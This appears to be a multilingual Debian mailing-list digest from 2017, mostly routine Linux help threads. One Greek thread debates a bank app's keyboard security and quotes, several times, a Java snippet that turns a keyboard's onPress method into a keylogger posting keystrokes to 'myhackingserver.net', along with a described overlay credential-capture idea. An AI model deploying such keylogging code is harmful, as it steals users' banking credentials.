> τους. Αφήνουν τον χρήστη να χρησιμοποιεί δικό του browser και δεν έχουν
> γράψει οι ίδιοι έναν για να τον δίνουν στους πελάτες τους, αφήνουν τον
> χρήστη να χρησιμοποιεί δικό του driver για keyboard, δικό του
> λειτουργικό σύστημα, δικό του firmware (bios ή uefi), δικό του microcode
> για τον επεξεργαστή, και στην τελική δικό του hardware. Στο phone
> banking δεν θα πάω, δίκτυο τηλεφωνίας από την τράπεζα εδώ και τώρα!
>
> Πέρα από την πλάκα, πρωτού πεις ότι κάτι είναι κενό ασφαλείας, πρέπει να
> εξετάσεις το threat model. Είναι απόλυτα αποδεκτό από την διεθνή
> κοινότητα να εμπιστεύεσαι το third party application για το
> πληκτρολόγιο. Αν κάποιος έχει την δυνατότητα να σου κάνει install ένα
> 'πειραγμένο' πληκτρολόγιο, και να έχει δικό της built-in πληκτρολόγιο η
> εφαρμογή έχεις χάσει το παιχνίδι. Στην τελική, σου κάνει install ένα app
> το οποίο έχει permissions να κάνει overlay (ίσως στέλνοντας τα κατάλληλα
> keystrokes από το ήδη εγκατεστημένο πληκτρολόγιο), δημιουργεί το overlay
> αυτό το οποίο είναι transparent και όταν βάζεις τον κωδικό στο
> πληκτρολόγιο της εφαρμογής απλά μαζεύει ότι γράφεις. Αυτός είναι ένας
> τρόπος που μου ήρθε στο μυαλό την ώρα που έγραφα το mail, μπορώ να σου
> πετάξω μερικές δεκάδες ακόμη.
> Επίσης μην νομίζεις ότι απλά έγραψαν ένα application και το δίνουν στον
> κόσμο. Υπάρχουν ειδικά standard βάση των οποίων όλα αυτά γίνονται audit.
> Δεν λέω ότι οι auditors θα βρουν τα πάντα, αλλά ένα τόσο χοντρό πρόβλημα
> (χρήση third party keyboard ενώ απαγορεύεται) θα το ανακάλυπταν στο
> λεπτό. Επίσης και τα standards μπορεί να μην είναι 100% σωστά, αλλά
> είναι widely accepted και όλοι λειτουργούν βάση αυτών.
>
> Απλά λίγο προσοχή πριν γίνουν δηλώσεις της μορφής 'κενό ασφαλείας από
> εθνική τράπεζα'. Για να αναφέρεις κάτι τόσο χοντρό και να επιμένεις τόσο
> πολύ πρέπει να είσαι σίγουρος ότι γνωρίζεις καλά το αντικείμενο και δεν
> σου έχει ξεφύγει τίποτε. Στην συγκεκριμένη περίπτωση νομίζω ότι σου
> έχουν ξεφύγει μερικά πραγματάκια, γιατί με την λογική σου θα έπρεπε να
> απαιτήσεις να γράψουν τουλάχιστον ένα λειτουργικό για το κινητό.
>
> My two cents,
> Φώτης
>
>

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[DIMITRIS]

Gia na kanei overly nomizw xreiazete root kai to alpha app sou vgazei
notification otan i syskeyi einai rooted

Episis se ti akrivos xreiazete ena costum pliktrologio sto mob app, to mono
pou tha kaneis einai na grapseis ena noumero kai ena description. Vazeis
tin glwssa tis xwras + english kai exeis kalupsei ta panta. Den einai
ypervoli ( poly douleia ) gia na valeis ena build in pliktrologio




2017-10-03 20:57 GMT+03:00 Fotis Loukos :

> Θα συμφωνήσω απόλυτα μαζί σου. Είναι τεράστιο κενό ασφαλείας. Και
> μάλιστα, με μία μικρή έρευνα μπόρεσα να ανακαλύψω ένα σύνολο από
> διαφορετικά κενά, που προσωπικά θα με κάνουν να κλείσω τον λογαριασμό μου:
> 1) Αφήνουν τον χρήστη να χρησιμοποιήσει λειτουργικό σύστημα τρίτου
> (android) και δεν έχουν αναπτύξει δικό τους! Αν είναι δυνατόν! Ξέρεις
> πόσο εύκολο είναι να βάλεις τον κώδικα που έδωσες στο λειτουργικό
> σύστημα και να κλέψεις τα στοιχεία;
> 2) Αφήνουν τον χρήστη να χρησιμοποιήσει συσκευή τρίτου και δεν έχουν
> κάνει δικό τους κινητό τηλέφωνο! Απίστευτο! Εξίσου εύκολο σε hardware να
> καταφέρεις να καταγράψεις τα σημεία που έκανε touch ο χρήστης και να
> εξάγεις τον κωδικό του από αυτά! Πρέπει άμεσα να ανοίξουν εργοστάσια και
> να παράγουν τα πάντα μόνοι τους! Ούτε να ακούσω για αγορά επεξεργαστών
> από την αγορά, ξέρεις τι προβλήματα μπορούν να δημιουργηθούν στο supply
> chain; Δες για παράδειγμα στο παρελθόν την cisco και τα θέματα με την NSA.
>
> Και τα προβλήματα δεν σταματάνε στο mobile app. Σκέψου το web banking
> τους. Αφήνουν τον χρήστη να χρησιμοποιεί δικό του browser και δεν έχουν
> γράψει οι ίδιοι έναν για να τον δίνουν στους πελάτες τους, αφήνουν τον
> χρήστη να χρησιμοποιεί δικό του driver για keyboard, δικό του
> λειτουργικό σύστημα, δικό του firmware (bios ή uefi), δικό του microcode
> για τον επεξεργαστή, και στην τελική δικό του hardware. Στο phone
> banking δεν θα πάω, δίκτυο τηλεφωνίας από την τράπεζα εδώ και τώρα!
>
> Πέρα από την πλάκα, πρωτού πεις ότι κάτι είναι κενό ασφαλείας, πρέπει να
> εξετάσεις το threat model. Είναι απόλυτα αποδεκτό από την διεθνή
> κοινότητα να εμπιστεύεσαι το third party application για το
> πληκτρολόγιο. Αν κάποιος έχει την δυνατότητα να σου κάνει install ένα
> 'πειραγμένο' πληκτρολόγιο, και να έχει δικό της built-in πληκτρολόγιο η
> εφαρμογή έχεις χάσει το παιχνίδι. Στην τελική, σου κάνει install ένα app
> το οποίο έχει permissions να κάνει overlay (ίσως στέλνοντας τα κατάλληλα
> keystrokes από το ήδη εγκατεστημένο πληκτρολόγιο), δημιουργεί το overlay
> αυτό το οποίο είναι transparent και όταν βάζεις τον κωδικό στο
> πληκτρολόγιο της εφαρμογής απλά μαζεύει ότι γράφεις. Αυτός είναι ένας
> τρόπος που μου ήρθε στο μυαλό την ώρα που έγραφα το mail, μπορώ να σου
> πετάξω μερικές δεκάδες ακόμη.
> Επίσης μην νομίζεις ότι απλά έγραψαν ένα application και το δίνουν στον
> κόσμο. Υπάρχουν ειδικά standard βάση των οποίων όλα αυτά γίνονται audit.
> Δεν λέω ότι οι auditors θα βρουν τα πάντα, αλλά ένα τόσο χοντρό πρόβλημα
> (χρήση third party keyboard ενώ απαγορεύεται) θα το ανακάλυπταν στο
> λεπτό. Επίσης και τα standards μπορεί να μην είναι 100% σωστά, αλλά
> είναι widely accepted και όλοι λειτουργούν βάση αυτών.
>
> Απλά λίγο προσοχή πριν γίνουν δηλώσεις της μορφής 'κενό ασφαλείας από
> εθνική τράπεζα'. Για να αναφέρεις κάτι τόσο χοντρό και να επιμένεις τόσο
> πολύ πρέπει να είσαι σίγουρος ότι γνωρίζεις καλά το αντικείμενο και δεν
> σου έχει ξεφύγει τίποτε. Στην συγκεκριμένη περίπτωση νομίζω ότι σου
> έχουν ξεφύγει μερικά πραγματάκια, γιατί με την λογική σου θα έπρεπε να
> απαιτήσεις να γράψουν τουλάχιστον ένα λειτουργικό για το κινητό.
>
> My two cents,
> Φώτης
>
> On 10/03/2017 08:11 PM, Ioannis Proios wrote:
> >
> >
> > Στις Τρί, 3 Οκτ 2017 στις 4:57 μ.μ., ο/η Nikolas Pattakos
> > > έγραψε:
> >
> > On Tue, Oct 3, 2017, at 07:26 AM, Ioannis Proios wrote:
> > > Καλημέρα.
> > >
> > > Ναι δεν είναι bug αλλά σίγουρα είναι δουλειά της εφαρμογής.
> > > Όπως δηλαδή και με το login του browser, αν η τράπεζα δεν
> > απαιτούσε SSL
> > > θα
> > > λέγαμε ότι φταίει ο browser που δεν το κάνει από μόνος.
> >
> > Δεν ασχολούμαι ιδιαίτερα με android ούτε έχω εθνική αλλά αφού
> επιμένεις:
> >
> > 1)  αν νομίζεις ότι έχεις βρει κάποιο κενό ασφαλείας, μπορείς να μου
> > (μας) πεις ποιο είναι αυτό που χρησιμοποιεί και τι θα έπρεπε να
> > χρησιμοποιεί για να μην θεωρείς ότι έχει κενό ασφαλείας.
> >
> > 2) ακόμα καλύτερα μπορείς να το χακάρεις; αν όχι ένα proof of concept
> > έστω ένα draft?
> >
> >
> > Επειδή θα "ανοίξω την όρεξη" σε κάποιους για hacking και ίσως αυτό
> > βοηθήσει να κλείσουν το σφάλμα θα δείξω πόσο απλό είναι :
> >
> > 1) ας πάρουμε ένα καλό πληκτρολόγιο πχ αυτό https://tinyurl.com/y8fqpade
> > 2) ας προσθέσουμε λίγο κώδικα στην μέθοδο onPress
> > εδώ https://tinyurl.com/ybe2qm5v πχ
> >
> > HttpClient httpclient = new DefaultHttpClient();
> > HttpPost httppost = new 

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[Fotis Loukos]

Θα συμφωνήσω απόλυτα μαζί σου. Είναι τεράστιο κενό ασφαλείας. Και
μάλιστα, με μία μικρή έρευνα μπόρεσα να ανακαλύψω ένα σύνολο από
διαφορετικά κενά, που προσωπικά θα με κάνουν να κλείσω τον λογαριασμό μου:
1) Αφήνουν τον χρήστη να χρησιμοποιήσει λειτουργικό σύστημα τρίτου
(android) και δεν έχουν αναπτύξει δικό τους! Αν είναι δυνατόν! Ξέρεις
πόσο εύκολο είναι να βάλεις τον κώδικα που έδωσες στο λειτουργικό
σύστημα και να κλέψεις τα στοιχεία;
2) Αφήνουν τον χρήστη να χρησιμοποιήσει συσκευή τρίτου και δεν έχουν
κάνει δικό τους κινητό τηλέφωνο! Απίστευτο! Εξίσου εύκολο σε hardware να
καταφέρεις να καταγράψεις τα σημεία που έκανε touch ο χρήστης και να
εξάγεις τον κωδικό του από αυτά! Πρέπει άμεσα να ανοίξουν εργοστάσια και
να παράγουν τα πάντα μόνοι τους! Ούτε να ακούσω για αγορά επεξεργαστών
από την αγορά, ξέρεις τι προβλήματα μπορούν να δημιουργηθούν στο supply
chain; Δες για παράδειγμα στο παρελθόν την cisco και τα θέματα με την NSA.

Και τα προβλήματα δεν σταματάνε στο mobile app. Σκέψου το web banking
τους. Αφήνουν τον χρήστη να χρησιμοποιεί δικό του browser και δεν έχουν
γράψει οι ίδιοι έναν για να τον δίνουν στους πελάτες τους, αφήνουν τον
χρήστη να χρησιμοποιεί δικό του driver για keyboard, δικό του
λειτουργικό σύστημα, δικό του firmware (bios ή uefi), δικό του microcode
για τον επεξεργαστή, και στην τελική δικό του hardware. Στο phone
banking δεν θα πάω, δίκτυο τηλεφωνίας από την τράπεζα εδώ και τώρα!

Πέρα από την πλάκα, πρωτού πεις ότι κάτι είναι κενό ασφαλείας, πρέπει να
εξετάσεις το threat model. Είναι απόλυτα αποδεκτό από την διεθνή
κοινότητα να εμπιστεύεσαι το third party application για το
πληκτρολόγιο. Αν κάποιος έχει την δυνατότητα να σου κάνει install ένα
'πειραγμένο' πληκτρολόγιο, και να έχει δικό της built-in πληκτρολόγιο η
εφαρμογή έχεις χάσει το παιχνίδι. Στην τελική, σου κάνει install ένα app
το οποίο έχει permissions να κάνει overlay (ίσως στέλνοντας τα κατάλληλα
keystrokes από το ήδη εγκατεστημένο πληκτρολόγιο), δημιουργεί το overlay
αυτό το οποίο είναι transparent και όταν βάζεις τον κωδικό στο
πληκτρολόγιο της εφαρμογής απλά μαζεύει ότι γράφεις. Αυτός είναι ένας
τρόπος που μου ήρθε στο μυαλό την ώρα που έγραφα το mail, μπορώ να σου
πετάξω μερικές δεκάδες ακόμη.
Επίσης μην νομίζεις ότι απλά έγραψαν ένα application και το δίνουν στον
κόσμο. Υπάρχουν ειδικά standard βάση των οποίων όλα αυτά γίνονται audit.
Δεν λέω ότι οι auditors θα βρουν τα πάντα, αλλά ένα τόσο χοντρό πρόβλημα
(χρήση third party keyboard ενώ απαγορεύεται) θα το ανακάλυπταν στο
λεπτό. Επίσης και τα standards μπορεί να μην είναι 100% σωστά, αλλά
είναι widely accepted και όλοι λειτουργούν βάση αυτών.

Απλά λίγο προσοχή πριν γίνουν δηλώσεις της μορφής 'κενό ασφαλείας από
εθνική τράπεζα'. Για να αναφέρεις κάτι τόσο χοντρό και να επιμένεις τόσο
πολύ πρέπει να είσαι σίγουρος ότι γνωρίζεις καλά το αντικείμενο και δεν
σου έχει ξεφύγει τίποτε. Στην συγκεκριμένη περίπτωση νομίζω ότι σου
έχουν ξεφύγει μερικά πραγματάκια, γιατί με την λογική σου θα έπρεπε να
απαιτήσεις να γράψουν τουλάχιστον ένα λειτουργικό για το κινητό.

My two cents,
Φώτης

On 10/03/2017 08:11 PM, Ioannis Proios wrote:
> 
> 
> Στις Τρί, 3 Οκτ 2017 στις 4:57 μ.μ., ο/η Nikolas Pattakos
> > έγραψε:
> 
> On Tue, Oct 3, 2017, at 07:26 AM, Ioannis Proios wrote:
> > Καλημέρα.
> >
> > Ναι δεν είναι bug αλλά σίγουρα είναι δουλειά της εφαρμογής.
> > Όπως δηλαδή και με το login του browser, αν η τράπεζα δεν
> απαιτούσε SSL
> > θα
> > λέγαμε ότι φταίει ο browser που δεν το κάνει από μόνος.
> 
> Δεν ασχολούμαι ιδιαίτερα με android ούτε έχω εθνική αλλά αφού επιμένεις:
> 
> 1)  αν νομίζεις ότι έχεις βρει κάποιο κενό ασφαλείας, μπορείς να μου
> (μας) πεις ποιο είναι αυτό που χρησιμοποιεί και τι θα έπρεπε να
> χρησιμοποιεί για να μην θεωρείς ότι έχει κενό ασφαλείας.
> 
> 2) ακόμα καλύτερα μπορείς να το χακάρεις; αν όχι ένα proof of concept
> έστω ένα draft?
> 
> 
> Επειδή θα "ανοίξω την όρεξη" σε κάποιους για hacking και ίσως αυτό
> βοηθήσει να κλείσουν το σφάλμα θα δείξω πόσο απλό είναι :
> 
> 1) ας πάρουμε ένα καλό πληκτρολόγιο πχ αυτό https://tinyurl.com/y8fqpade
> 2) ας προσθέσουμε λίγο κώδικα στην μέθοδο onPress
> εδώ https://tinyurl.com/ybe2qm5v πχ 
> 
> HttpClient httpclient = new DefaultHttpClient();
> HttpPost httppost = new HttpPost("http://myhackingserver.net/onpress;);
> 
> try {
> // Add your data
> List nameValuePairs = new
> ArrayList(1);
> nameValuePairs.add(new BasicNameValuePair("pressdata",
> primaryCode));
> httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
> 
> // Execute HTTP Post Request
> HttpResponse response = httpclient.execute(httppost);
> 
> } catch (ClientProtocolException e) {
> } catch (IOException e) {
> }
> 
> 3) το ανεβάσουμε στο google play για κάθε χρήση
> 
> Ελπίζω τώρα την επόμενη φορά που θα κάνεις login στην τράπεζα να το
> σκεφτείς καλά ;)
> 
> 

Re: v4l2 cameras in stretch.

[peter]

*   From: deloptes 
*   Date: Tue, 03 Oct 2017 09:19:29 +0200
> I was using Haupauge PVR like 10y ago.

Yikes! This is a WinTV, NTSC/NTSC-J 26552 REV F0A3 LF.  
http://easthope.ca/HauppaugeWinTV.jpg

> http://www.hauppauge.com/site/support/linux.html

These models are mentioned.
*   WinTV-HVR-955Q
*   WinTV-dualHD (all models)
*   WinTV-quadHD (all models)
*   WinTV-soloHD (DVB T/T2/C)
*   WinTV-HVR-1255 and WinTV-HVR-1265

Any similarity to the WinTV, NTSC/NTSC-J 26552? Is it older or newer?

With this model being different from any mentioned in the documents 
and a 4.9.0-3-686-pae kernel here versus 4.2 referenced by  Hauppauge, 
dormant rot (https://en.wikipedia.org/wiki/Software_rot#Dormant_rot) 
is the concern.  I can submit a bug report but maintainers won't 
necessarily have time for a goose chase.  

> https://ubuntuforums.org/showthread.php?t=1634445

It addresses the WinTV PVR-150.  Again I have no idea of similarity to 
this adapter.

Will investigate the NTSC vs. PAL question before pursuing software 
further.

Thanks for the reply,   ... Peter E.
-- 

123456789 123456789 123456789 123456789 123456789 123456789 123456789
Tel: +1 360 639 0202  Pender Is.: +1 250 629 3757
http://easthope.ca/Peter.html  Bcc: peter at easthope. ca

Re: [HS] Transformer image pixels en mode vectoriel

[andre_debian]

On Tuesday 03 October 2017 17:11:45 you wrote:
> > J'ai fait ce qui est demandé sur la page :
> > # apt-get install npm
> > # npm install -g png2svg
> > # png2svg logo.png logo.svg
> > /usr/bin/env: node: Aucun fichier ou dossier de ce type :
Ici, ça marche pas.

> > > il faut mettre en place potrace :
> > > stackoverflow.com/questions/1861382/how-to-convert-a-png-image-to-a-svg
> > > bernard

> alors c'est dédé qui se moqie de la fdj :
Merci d'éviter ces familiarités.

> réponse 94 sur stackoverflow :
> convert file.png file.pnm# PNG to PNM
> potrace file.pnm -s -o file.svg  # PNM to SVG
> bernard

Certes, mais l'image.svg créée se met en noir et blanc.

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[Ioannis Proios]

Στις Τρί, 3 Οκτ 2017 στις 4:57 μ.μ., ο/η Nikolas Pattakos <
pattak...@fastmail.com> έγραψε:

> On Tue, Oct 3, 2017, at 07:26 AM, Ioannis Proios wrote:
> > Καλημέρα.
> >
> > Ναι δεν είναι bug αλλά σίγουρα είναι δουλειά της εφαρμογής.
> > Όπως δηλαδή και με το login του browser, αν η τράπεζα δεν απαιτούσε SSL
> > θα
> > λέγαμε ότι φταίει ο browser που δεν το κάνει από μόνος.
>
> Δεν ασχολούμαι ιδιαίτερα με android ούτε έχω εθνική αλλά αφού επιμένεις:
>
> 1)  αν νομίζεις ότι έχεις βρει κάποιο κενό ασφαλείας, μπορείς να μου
> (μας) πεις ποιο είναι αυτό που χρησιμοποιεί και τι θα έπρεπε να
> χρησιμοποιεί για να μην θεωρείς ότι έχει κενό ασφαλείας.
>
> 2) ακόμα καλύτερα μπορείς να το χακάρεις; αν όχι ένα proof of concept
> έστω ένα draft?
>

Επειδή θα "ανοίξω την όρεξη" σε κάποιους για hacking και ίσως αυτό βοηθήσει
να κλείσουν το σφάλμα θα δείξω πόσο απλό είναι :

1) ας πάρουμε ένα καλό πληκτρολόγιο πχ αυτό https://tinyurl.com/y8fqpade
2) ας προσθέσουμε λίγο κώδικα στην μέθοδο onPress εδώ
https://tinyurl.com/ybe2qm5v πχ

HttpClient httpclient = new DefaultHttpClient();
HttpPost httppost = new HttpPost("http://myhackingserver.net/onpress;);

try {
// Add your data
List nameValuePairs = new
ArrayList(1);
nameValuePairs.add(new BasicNameValuePair("pressdata",
primaryCode));
httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));

// Execute HTTP Post Request
HttpResponse response = httpclient.execute(httppost);

} catch (ClientProtocolException e) {
} catch (IOException e) {
}

3) το ανεβάσουμε στο google play για κάθε χρήση

Ελπίζω τώρα την επόμενη φορά που θα κάνεις login στην τράπεζα να το
σκεφτείς καλά ;)





>
> > Επειδή λοιπόν μιλάμε για την υπ.αριθμόν 1(?) τράπεζα της Ελλάδος θεωρώ
> > τραγικό λάθος να παραβλέψει το θέμα ασφαλείας.
> > Ένας λόγος παραπάνω έπρεπε να δώσει μεγαλύτερη προσοχή επειδή είχε να
> > κάνει
> > με ένα open source OS και όχι να το αφήσει κατά το "δοκούν".
>
> Πρώτον δεν είναι όλα στο android open source. ξέρεις ποιον κώδικα
> χρησιμοποιεί αυτό που ισχυρίζεσαι ότι δεν είναι ασφαλές και αν είναι
> open source ή proprietary?
> Δεύτερον, η σύνδεση που κάνεις στο επειχείρημά σου μεταξύ open source
> και μεγαλύτερης προσοχής είναι νομίζω μεταξύ ασαφής, συζητήσιμης ίσως
> και αβάσιμης.


το opensource το ανέφερα επειδή εδώ (android) τα πράγματα είναι ποιο
ευέλικτα και θα περίμενε κάποιος να δώσει μεγαλύτερη προσοχή σε θέματα
ασφαλείας όπως πχ η Εθνική.
Αν είμαστε σε M$ πχ δεν θα το συζητήσουμε κάν και θα κοιμόμασταν ήσυχοι ;)

Re: Re: Prevent apt/dpkg from automatically enabling services during the upgrade process.

[cabezachumbo]

> This is not supposed to happen in the first place.  Could you give an
> example?
> 
> Cheers,
> 
>Sven

An example:
1. Disable the service NetworkManager: "systemctl disable NetworkManager".
2. Upgrade the package NetworkManager via "apt upgrade".
The service NetworkManager will be enabled automatically during the upgrade 
process. 

Re: mail et reply

[Étienne Mollier]

Bonjour,

Le 3 oct. 2017 15:52, "David - DCPC"  a écrit :
> Merci pour l'alerte, mais je comprends pas trop d'où ça provient

Le mail a été envoyé par GMail avec un contenu HTML et un contenu
texte.  Le contenu HTML est affiché par les clients mails qui le
supportent (y compris les archives Debian), mais la version texte
a l'air dans les choux.  Les chevrons de la citation n'apparaissent
pas dans la version texte si je fais un “View source” du mail
incriminé :

Le 3 octobre 2017 =C3=A0 10:57, Eric Degenetais  
a =
=C3=A9crit :

> Le 2 oct. 2017 9:42 PM, "Yann Serre"  a
> =C3=A9crit :
>
> Bonjour,
>
> Prenons l'exemple d'un site authentique avec le domaine axa.com
[...]

Alors qu'on aurait dû avoir à peu près ceci pour correspondre tout
à fait à la version HTML :

Le 3 octobre 2017 =C3=A0 10:57, Eric Degenetais  
a =
=C3=A9crit :

> Le 2 oct. 2017 9:42 PM, "Yann Serre"  a
> =C3=A9crit :
>
> > Bonjour,
> >
> > Prenons l'exemple d'un site authentique avec le domaine axa.com
[...]


GMail n'est pas copain avec les utilisateurs du plain texte. :)


Mais je dirais que c'est plus probablement lié à la sémantique de
citation, qui se serait perdue lors d'une manipulation quelconque
lors de l'édition du message.

À plus,
-- 
Étienne Mollier 

Re: mail et reply (was: phishing en UTF8)

[Eric Degenetais]

Le 3 oct. 2017 15:52, "David - DCPC"  a écrit :

Bonjour,

Pour Vincent.

Merci pour l'alerte, mais je comprends pas trop d'où ça provient étant
donné que je viens de refaire des tests et relire plusieurs anciens emails
échangés sur différentes sources avec différents clients, et je ne vois pas
ce problème, tout est bien visible avec 2 ou + niveaux. J'avoue ne jamais
trop avoir regardé s'il y a des détails spécifiques sur les mails dans ces
listes de diffusion, sauf à devoir à chaque fois inverser les destinataires
qd je fait un reply all avec gmail ; et jamais eu de remarque de ce genre
sinon.

Bonsoir, en fait je pense que le message visé était le mien.


Quand au "conseil" sur gmail, je le prendrais tel quel, mais me permettrai
de l'ignorer, ayant qd même le choix pour gérer mes emails, surtout qu'il
fonctionne très bien depuis de nombreuses années avec des centaines de
contacts tant personnels que professionnels. Et que je ne semble pas être
le seul à en être très satisfait.


J'ai aussi la ferme intention de garder gmail, qui me convient.


Quand à l'affichage, en fait je viens de voir sur les archives officielles
de la liste que mon message semble apparaître normalement :
https://lists.debian.org/debian-user-french/2017/10/msg00019.html

Même vérification pour ma part, même résultat : sur les archives mon mail a
l'air de respecter les différents niveaux de réponse. Bizarre.


Avez-vous bien configuré votre client mail ou bien testé un autre client
mail ? ( :o) )

David


Le 3 octobre 2017 à 13:18, Vincent Lefevre  a écrit :

> On 2017-10-03 09:24:51 +, Eric Degenetais wrote:
> > Le 3 oct. 2017 11:16 AM, "David - DCPC"  a écrit :
> >
> > Ha merci beaucoup pour l'explication.
> > Par contre du coup pour détecter ça, c'est plus compliqué ..
> >
> > Effectivement ! D'où l'idée de la frappe manuelle ou du favori : comme on
> > n'utilise pas l'adresse du mail, on n'a pas besoin de détecter le piège
> > pour l'éviter.
>
> Il faudrait apprendre à citer correctement, et éviter gmail par la
> même occasion. Ci-dessus le texte cité et la réponse apparaissent
> au même niveau.
>
> --
> Vincent Lefèvre  - Web: 
> 100% accessible validated (X)HTML - Blog: 
> Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
>
>


-- 
Salutations,
David CHALON

Re: remettre windows

[Pascal Hambourg]

Le 03/10/2017 à 17:11, hamster a écrit :

Quelqu'un a qui j'ai installé débian en double boot n'est pas séduit par
le bidule et me demande de lui remettre l'ordi avec uniquement windows.
Je me fais un point d'honneur a satisfaire sa demande, seulement voila :
si je vire debian, grub ne marche plus.


Normal, un gros bout de GRUB était installé dans /boot.
Je suppose que tu avais installé GRUB dans le MBR ?
Sinon, si tu avais installé GRUB dans le secteur d'amorce d'une 
partition et mis le drapeau d'amorçage sur celle-ci, il suffit de 
déplacer le drapeau d'amorçage sur la partition Windows avec n'importe 
quel partitionneur.



Une solution serait de restaurer le bootloader de windows, mais je sais
pas faire.


Moi non plus. J'ai entendu parler de fixboot et fixmbr avec un CD ou DVD 
d'installation de Windows, mais jamais fait.



Est-ce qu'il existe des bootloaders indépendants
de linux pour remplacer grub (et dans ce cas lequel me conseillez vous) ?


mbr, qui installe un code amorce presque standard dans le MBR.
Lancer l'installateur Debian en mode expert.
Sélectionner mbr dans les composants additionnels.
Dès que possible, passer dans une console (Alt+F2 ou F3) et installer le 
code amorce avec la commande


install-mbr /dev/sdX

où sdX est le disque interne.

Re: remettre windows

[bernard . schoenacker]

- Mail original -
> De: "hamster" 
> À: debian-user-french@lists.debian.org
> Envoyé: Mardi 3 Octobre 2017 17:11:17
> Objet: remettre windows
> 
> Quelqu'un a qui j'ai installé débian en double boot n'est pas séduit
> par
> le bidule et me demande de lui remettre l'ordi avec uniquement
> windows.
> Je me fais un point d'honneur a satisfaire sa demande, seulement
> voila :
> si je vire debian, grub ne marche plus. Y'a toujours windows mais
> rien
> pour le lancer.
> 
> Une solution serait de restaurer le bootloader de windows, mais je
> sais
> pas faire.
> 
> Comment vous feriez vous ? Laisser une partoche /boot rien que pour
> que
> grub puisse marcher ? Est-ce qu'il existe des bootloaders
> indépendants
> de linux pour remplacer grub (et dans ce cas lequel me conseillez
> vous) ?
> 
> Merci pour votre aide.
> 
bonjour,

voici la solution :
https://doc.ubuntu-fr.org/tutoriel/comment_reinstaller_un_mbr_compatible_windows

slt
bernard

Consumo anormal de la batería de mi Laptop - Debian 9

[Harley Becerra]

Hola a todos

Mi problema es que al instalar debían 9 en mi portátil Asus n551jk,
la batería  es consumida en pocos tiempo menos de una hora,
he probado instalando la utilidad powertop y configurarla

https://packages.debian.org/search?keywords=powertop

pero aun el consumo esta igual.

soy nuevo en el mundo linux y me gustaría tener su ayuda para optimizar los
recursos de energía mi PC.


-- 
Harley Becerra

Re: Rien ne se passe après Grub2...oops oubliez la pièce jointe dans le dernier message...

[Sébastien NOBILI]

Le mardi 03 octobre 2017 à 10:48, louis a écrit :
> Pensez-vous que le screenshot en PJ a à voir avec ce problème?

Aaaah, voilà la pièce-jointe :D

Le « -.mount » est étrange… Un problème avec le contenu de fstab ou bien un
problème d’interprétation de son contenu par Systemd.

Pourrais-tu nous envoyer le contenu du fichier « /etc/fstab » de ton système
Debian (pas celui du LiveCD).

Si tu as des mots de passe dedans, efface-les avant.

Sébastien

Re: [HS] Transformer image pixels en mode vectoriel

[bernard . schoenacker]

- Mail original -
> De: "andre debian" 
> À: debian-user-french@lists.debian.org
> Envoyé: Mardi 3 Octobre 2017 16:59:55
> Objet: Re: [HS] Transformer image pixels en mode vectoriel
> 
> On Tuesday 03 October 2017 16:18:39 you wrote:
> > > Comment transformer une image (logo) PNG pixels,
> > > au format vectoriel (SVG) ?
> 
> > et voici le paquet :
> > https://www.npmjs.com/package/png2svg
> > bernard
> 
> Merci, mais...
> 
> J'ai fait ce qui est demandé sur la page :
> # apt-get install npm
> # npm install -g png2svg
> # png2svg logo.png logo.svg
> /usr/bin/env: node: Aucun fichier ou dossier de ce type
> 
> > il faut mettre en place potrace :
> > stackoverflow.com/questions/1861382/how-to-convert-a-png-image-to-a-svg
> > bernard
> 
> Pas d'infos non plus à ce lien...
> 
> sauf ceci : https://vectormagic.com/
> pas mal mais image un peu déformée à l'arrivée.
> 
> André
> 
> 
> 

alors c'est dédé qui se moqie de la fdj ...

réponse 94 sur stackoverflow :

convert file.png file.pnm# PNG to PNM
potrace file.pnm -s -o file.svg  # PNM to SVG

slt
bernard

remettre windows

[hamster]

Quelqu'un a qui j'ai installé débian en double boot n'est pas séduit par
le bidule et me demande de lui remettre l'ordi avec uniquement windows.
Je me fais un point d'honneur a satisfaire sa demande, seulement voila :
si je vire debian, grub ne marche plus. Y'a toujours windows mais rien
pour le lancer.

Une solution serait de restaurer le bootloader de windows, mais je sais
pas faire.

Comment vous feriez vous ? Laisser une partoche /boot rien que pour que
grub puisse marcher ? Est-ce qu'il existe des bootloaders indépendants
de linux pour remplacer grub (et dans ce cas lequel me conseillez vous) ?

Merci pour votre aide.

Re: Rien ne se passe après Grub2...

[Sébastien NOBILI]

Bonjour,

Le mardi 03 octobre 2017 à 10:46, louis a écrit :
> Le problème est sur une debian Stretch 9.1 stable, xfce4.
> Précisément, après le menu grub, j'appuie sur enter pour choisir cette
> debian et rien ne se passe...un clignotement, puis un message
> disant :Gave up waiting for suspend/resume device

Tu pourrais essayer d’ajouter « noresume » aux arguments du noyau. Lorsque tu es
au niveau de Grub, tu appuies sur « e » (de mémoire), puis tu descends avec les
flèches jusqu’à la ligne qui contient les arguments du noyau (elle doit contenir
notamment « root= » et « init= ») et tu ajoutes « noresume ».

Ensuite, pour booter, c’est « F10 » (toujours de mémoire, mais c’est indiqué à
l’écran).

> Pensez-vous que le screenshot en PJ a à voir avec ce problème?

Tu as oublié de joindre la pièce ;)

Sébastien

Re: [HS] Transformer image pixels en mode vectoriel

[andre_debian]

On Tuesday 03 October 2017 16:18:39 you wrote:
> > Comment transformer une image (logo) PNG pixels,
> > au format vectoriel (SVG) ?

> et voici le paquet :
> https://www.npmjs.com/package/png2svg
> bernard

Merci, mais...

J'ai fait ce qui est demandé sur la page :
# apt-get install npm
# npm install -g png2svg
# png2svg logo.png logo.svg
/usr/bin/env: node: Aucun fichier ou dossier de ce type

> il faut mettre en place potrace :
> stackoverflow.com/questions/1861382/how-to-convert-a-png-image-to-a-svg
> bernard

Pas d'infos non plus à ce lien...

sauf ceci : https://vectormagic.com/
pas mal mais image un peu déformée à l'arrivée.

André

Rien ne se passe après Grub2...oops oubliez la pièce jointe dans le dernier message...

[louis]

Bonjour à tous et à toutes!

Le problème est sur une debian Stretch 9.1 stable, xfce4.
Précisément, après le menu grub, j'appuie sur enter pour choisir cette
debian et rien ne se passe...un clignotement, puis un message
disant :Gave up waiting for suspend/resume device

Et avec le mode sans échec, je me heurte
à :Begin /scripts/local-block.Done
Et sa répète cette ligne à l'infini..

